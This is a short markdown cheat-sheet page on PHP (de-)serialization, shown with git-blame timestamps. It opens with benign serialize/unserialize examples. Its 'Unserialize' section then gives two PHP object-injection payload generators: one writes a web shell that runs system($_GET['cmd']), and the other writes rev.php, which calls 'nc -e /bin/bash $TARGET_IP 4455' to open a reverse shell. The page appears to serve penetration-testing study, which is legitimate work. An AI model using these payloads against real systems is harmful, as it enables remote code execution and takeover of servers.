2024-05-07 21:38:46 +02:00
|
|
|
# PHP (De-)Serialization
|
|
|
|
|
|
|
|
|
|
A basic example of (de-)serialization is the following
|
|
|
|
|
|
|
|
|
|
Serialize is show in the following snippet.
|
|
|
|
|
|
|
|
|
|
```php
|
|
|
|
|
<?php
|
|
|
|
|
$plain_text = array("title" => "Hello, World!", "content" => "Lore Ipsum Dolor");
|
|
|
|
|
$serialized = serialize($plain_text);
|
|
|
|
|
file_put_contents('serialized.txt', $serialized);
|
|
|
|
|
?>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Deserialize is done in the following snippet.
|
|
|
|
|
|
|
|
|
|
```php
|
|
|
|
|
<?php
|
|
|
|
|
$serialized = file_get_contents('serialized.txt');
|
|
|
|
|
$plain_text = unserialize($serialized);
|
|
|
|
|
echo "Title: " . $plain_text['title'];
|
|
|
|
|
echo "Content: " . $plain_text['content'];
|
|
|
|
|
?>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
## Unserialize
|
2022-11-13 22:52:30 +01:00
|
|
|
|
|
|
|
|
* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize)
|
|
|
|
|
|
2024-05-07 21:38:46 +02:00
|
|
|
Serialize a form on a website through PHP via
|
|
|
|
|
|
2022-11-13 22:52:30 +01:00
|
|
|
```php
|
|
|
|
|
<?php
|
|
|
|
|
class FormSubmit {
|
|
|
|
|
public $form_file = 'messages.php';
|
|
|
|
|
public $message = '<?php
|
|
|
|
|
if(isset($_GET[\'cmd\']))
|
|
|
|
|
{
|
|
|
|
|
system($_GET[\'cmd\']);
|
|
|
|
|
}
|
|
|
|
|
?>';
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
print urlencode(serialize(new FormSubmit));
|
|
|
|
|
?>
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
```php
|
|
|
|
|
<?php class file
|
|
|
|
|
{
|
|
|
|
|
public $file = 'rev.php'; public $data = '<?php shell_exec("nc -e /bin/bash $TARGET_IP 4455"); ?>';
|
|
|
|
|
}
|
|
|
|
|
echo (serialize(new file));
|
|
|
|
|
?>
|
|
|
|
|
```
|
